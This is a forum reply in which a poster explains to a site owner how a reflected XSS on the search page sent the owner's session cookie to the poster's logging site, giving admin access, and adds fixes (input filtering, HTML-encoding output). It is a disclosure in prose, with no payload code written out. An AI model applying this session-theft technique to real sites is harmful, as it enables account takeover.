bombshop wrote:Wow that's nice work! Please let me understand, you could get the admin access while my cookie was valid or whenever you want? Thanks again, it is good to know that it is vulnerable
Only when your cookie (session) was valid, which I believe is 24 minutes after you log out, by default. Basically the link I sent you to caused a redirect to my site along with your cookie in the URL, which I then logged. My script then sent you back to your main page, making it look like a simple redirect bug in your site. The XSS was reflected back on the search page because your site echoes back whatever I search for, largely unfiltered. You did a good job escaping quotes, but because of browsers' tendencies to ignore bad markup, I was able to load an external script in a technically illegal way.
This is a good example of why defense-in-depth is a good idea. I would suggest filtering out any input that does not look like an IP address (there are tons of regex patterns for this), and HTML-encoding anything printed in the HTTP header results page. This second part is because even if the search error page is safe, the results may not be. I set up my page to deliver an XSS payload as its header, which I believe will be included in the results (and therefore the main page) when it is indexed.